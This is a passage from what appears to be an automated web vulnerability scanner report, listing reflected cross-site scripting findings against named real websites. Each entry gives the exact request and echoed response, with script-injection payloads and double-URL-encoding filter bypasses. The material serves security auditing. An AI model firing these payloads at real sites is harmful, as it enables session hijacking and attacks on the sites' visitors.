Last-Modified: Wed, 04 May 2011 03:26:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 20783

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr
...[SNIP]...
<A href="/user/login?destination=favicon.icoa4697"><script>alert(1)</script>1d296c9f2d2">
...[SNIP]...

6.90. http://www.royal.gov.uk/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.royal.gov.uk
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 59d00-->a98bd1eb681 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico?59d00-->a98bd1eb681=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.royal.gov.uk
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:21:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rzswhj55rw43vlauyketp355; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 5961


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"[]><html xmlns="http://www.w3.org/1999/xhtml" xmlns:Abseil="http://www.coraider.c
...[SNIP]...
<!-- RealPage 404;http://www.royal.gov.uk:80/favicon.ico?59d00-->a98bd1eb681=1 -->
...[SNIP]...

6.91. http://www.sbc.net/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sbc.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23209<a>ddb84a28b29 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico23209<a>ddb84a28b29 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sbc.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 04 May 2011 03:03:56 GMT
Content-Length: 27792
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAQDTARB=CKAJMHODPLKFKPAININAGGCK; path=/
Cache-control: private


<html>
<head>

<title>Southern Baptist Convention - Terms of Use</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">
<!--

fun
...[SNIP]...
<b>http://www.sbc.net/favicon.ico23209<a>ddb84a28b29</b>
...[SNIP]...

6.92. http://www.silvalifesystem.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.silvalifesystem.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f029"><a>a199bee6dad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /favicon.ico9f029"><a>a199bee6dad HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.silvalifesystem.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:40:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2-1ubuntu4.8
Set-Cookie: PHPSESSID=fbaeu5sr4qu6bq99kmdjj4djj6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 6312

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
               <script type="tex
...[SNIP]...
<meta name="keywords" content=",Favicon.ico9f029"><a>a199bee6dad" />
...[SNIP]...

6.93. http://www.smokin4free.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smokin4free.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b868e"><script>alert(1)</script>373ca93dc9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b868e"><script>alert(1)</script>373ca93dc9a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smokin4free.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:06:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: PHPSESSID=df9137a3abb36dcbc9c200cba781bff5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 17759

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Page not found.</title>
<meta name="keywords" content="cigarette, cigarettes, online shopping, smoke, store,
...[SNIP]...
<a class="menu-signin" href="/signin.html?referer=/b868e"><script>alert(1)</script>373ca93dc9a">
...[SNIP]...

6.94. http://www.sothebysrealty.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sothebysrealty.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc5d"onerror%3d"alert(1)"343db407a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3cc5d"onerror="alert(1)"343db407a58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico?3cc5d"onerror%3d"alert(1)"343db407a58=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sothebysrealty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 20847
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mwl5qa55jr2xjbalh3of0aqd; path=/; HttpOnly
Set-Cookie: LanguagePreference=eng; expires=Thu, 03-May-2012 02:05:17 GMT; path=/
Set-Cookie: LanguagePreference=eng; expires=Thu, 03-May-2012 02:05:17 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:05:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
           Page Not F
...[SNIP]...
<img alt="DCSIMG" id="DCSIMG" width="1" height="1"
src="http://statse.webtrendslive.com/dcsfhi2rb10000o2ujlbas1fp_9n3h/njs.gif?dcsuri=/eng/favicon.ico?3cc5d"onerror="alert(1)"343db407a58=1&WT.js=No&WT.tv=1.0.7"/>
...[SNIP]...

6.95. http://www.sourcingmap.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sourcingmap.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d3a4"-alert(1)-"02495b7bd57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico7d3a4"-alert(1)-"02495b7bd57 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sourcingmap.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 01:09:36 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.6
Set-Cookie: cookie_test=please_accept_for_session; expires=Fri, 03-Jun-2011 01:09:34 GMT; path=/; domain=sourcingmap.com
Set-Cookie: osCsid=36369e11f5df6c7ef158b438f9cfd959; path=/; domain=sourcingmap.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: customers_landing_page=http%3A%2F%2Fwww.sourcingmap.com%2Ffavicon.ico7d3a4%22-alert%281%29-%2202495b7bd57; expires=Thu, 05-May-2011 01:09:34 GMT; path=/; domain=sourcingmap.com
Content-Length: 69873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="tex
...[SNIP]...
<script type="text/javascript">
var xajaxRequestUri="http://www.sourcingmap.com/favicon.ico7d3a4"-alert(1)-"02495b7bd57";
var xajaxDebug=false;
var xajaxStatusMessages=false;
var xajaxWaitCursor=true;
var xajaxDefinedGet=0;
var xajaxDefinedPost=1;
var xajaxLoaded=false;
function xajax_get_category_product(){return xaja
...[SNIP]...

6.96. http://www.sweet-babies.ws/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sweet-babies.ws
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d226"><script>alert(1)</script>93a2b091227 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?5d226"><script>alert(1)</script>93a2b091227=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sweet-babies.ws
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 883


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Teen-Babies.com Sweet-Babies.com Fantasia-Models.com </title>
<META name
...[SNIP]...
<frame src="http://94.102.48.184/favicon.ico?5d226"><script>alert(1)</script>93a2b091227=1" frameborder="0" />
...[SNIP]...

6.97. http://www.swiftpage5.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage5.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 34e58%253cscript%253ealert%25281%2529%253c%252fscript%253e05f53afd2be was submitted in the REST URL parameter 1. This input was echoed as 34e58<script>alert(1)</script>05f53afd2be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico34e58%253cscript%253ealert%25281%2529%253c%252fscript%253e05f53afd2be HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage5.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Wed, 04 May 2011 01:18:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage5.com/Spe404.aspx?404;http://www.swiftpage5.com:80/favicon.ico34e58<script>alert(1)</script>05f53afd2be<br>
...[SNIP]...

6.98. http://www.swiftpage5.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage5.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 21f8f<script>alert(1)</script>527b110edab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?21f8f<script>alert(1)</script>527b110edab=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage5.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Connection: close
Date: Wed, 04 May 2011 01:18:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage5.com/Spe404.aspx?404;http://www.swiftpage5.com:80/favicon.ico?21f8f<script>alert(1)</script>527b110edab=1<br>
...[SNIP]...

6.99. http://www.swiftpage7.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage7.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4f6e0%253cscript%253ealert%25281%2529%253c%252fscript%253e1f3a90088d5 was submitted in the REST URL parameter 1. This input was echoed as 4f6e0<script>alert(1)</script>1f3a90088d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico4f6e0%253cscript%253ealert%25281%2529%253c%252fscript%253e1f3a90088d5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Wed, 04 May 2011 03:56:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage7.com/spe404.aspx?404;http://www.swiftpage7.com:80/favicon.ico4f6e0<script>alert(1)</script>1f3a90088d5<br>
...[SNIP]...

6.100. http://www.swiftpage7.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage7.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cf566<script>alert(1)</script>20e1a73723a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?cf566<script>alert(1)</script>20e1a73723a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Wed, 04 May 2011 03:56:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage7.com/spe404.aspx?404;http://www.swiftpage7.com:80/favicon.ico?cf566<script>alert(1)</script>20e1a73723a=1<br>
...[SNIP]...

6.101. http://www.swiftpage8.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage8.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5f5e9%253cscript%253ealert%25281%2529%253c%252fscript%253e0ee45c0162c was submitted in the REST URL parameter 1. This input was echoed as 5f5e9<script>alert(1)</script>0ee45c0162c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.ico5f5e9%253cscript%253ealert%25281%2529%253c%252fscript%253e0ee45c0162c HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage8.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Wed, 04 May 2011 02:04:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 592


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage8.com/spe404.aspx?404;http://www.swiftpage8.com:80/favicon.ico5f5e9<script>alert(1)</script>0ee45c0162c<br>
...[SNIP]...

6.102. http://www.swiftpage8.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.swiftpage8.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e60a6<script>alert(1)</script>2d581a1d9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?e60a6<script>alert(1)</script>2d581a1d9a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiftpage8.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 File Not Found
Date: Wed, 04 May 2011 02:04:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 590


               <html>
                   <head>
                       <title>404 File Not Found</title>
                   </head>
                   <body>
                       <H1>404 File Not Found</H1>
                       <br><br><br><br>
                       Full URL: http://www.swiftpage8.com/spe404.aspx?404;http://www.swiftpage8.com:80/favicon.ico?e60a6<script>alert(1)</script>2d581a1d9a=1<br>
...[SNIP]...

6.103. http://www.theamericanmonk.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b343e"><script>alert(1)</script>50991e09f46 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icob343e"><script>alert(1)</script>50991e09f46 HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5cb03221148399a25dd09778513498e6; __utmz=63675568.1304488484.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63675568.836338964.1304488484.1304488484.1304488484.1; __utmc=63675568; __utmb=63675568.1.10.1304488484; sess_=ysv9sd684163c3y; lastvisit=1304488486; km_lv=1304488488; ref_=mr_7; vid=206617815

Response

HTTP/1.0 404 Not Found
Date: Wed, 04 May 2011 00:55:46 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 82616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/favicon.icob343e"><script>alert(1)</script>50991e09f46" />
...[SNIP]...

6.104. http://www.theamericanmonk.com/members/forgot-password [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.theamericanmonk.com
Path:   /members/forgot-password

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f32cb"><script>alert(1)</script>5a6090d4a1c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /membersf32cb"><script>alert(1)</script>5a6090d4a1c/forgot-password HTTP/1.1
Host: www.theamericanmonk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Wed, 04 May 2011 00:55:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=109d9f90dd2cbea343f456c5ceb07cad; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 82678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
           
<script type="te
...[SNIP]...
<input type="hidden" name="atag" value="/membersf32cb"><script>alert(1)</script>5a6090d4a1c/forgot-password" />
...[SNIP]...

6.105. http://www.uww.edu/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.uww.edu
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f6b1"-alert(1)-"e1d7540cf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?8f6b1"-alert(1)-"e1d7540cf67=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.uww.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 4906
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
<script type="text/javascript">
   var query = "favicon.ico?8f6b1"-alert(1)-"e1d7540cf67=1";
   $(document).ready(function () {
       $("input#q").val(query);
       // submit new search
       $("#searchB").click(function () {
           var q = $("#q").val();
           $(this).attr("href", "http://search.uww.ed
...[SNIP]...

6.106. http://www.wine.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d17b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6dd24e38d99 was submitted in the REST URL parameter 1. This input was echoed as d17b8"><script>alert(1)</script>6dd24e38d99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /favicon.icod17b8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6dd24e38d99 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wine.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 00:47:34 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=BA81B997%2D6B2F%2D417B%2D84CC%2D14E93D8EC11A; expires=Thu, 03-May-2012 00:47:34 GMT; domain=www.wine.com; path=/
Set-Cookie: ASPSESSIONIDCADBSCTT=JPPLONODBJOLIALDLGAOENCM; path=/
Cache-control: private
Set-Cookie: SL_Audience=72|Accelerated|112|1|0;Expires=Fri, 03-May-13 00:47:34 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=32446520.SL_TS_Accelerated;Expires=Fri, 03-May-13 00:47:34 GMT;Path=/;Domain=.wine.com
Content-Length: 24240


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
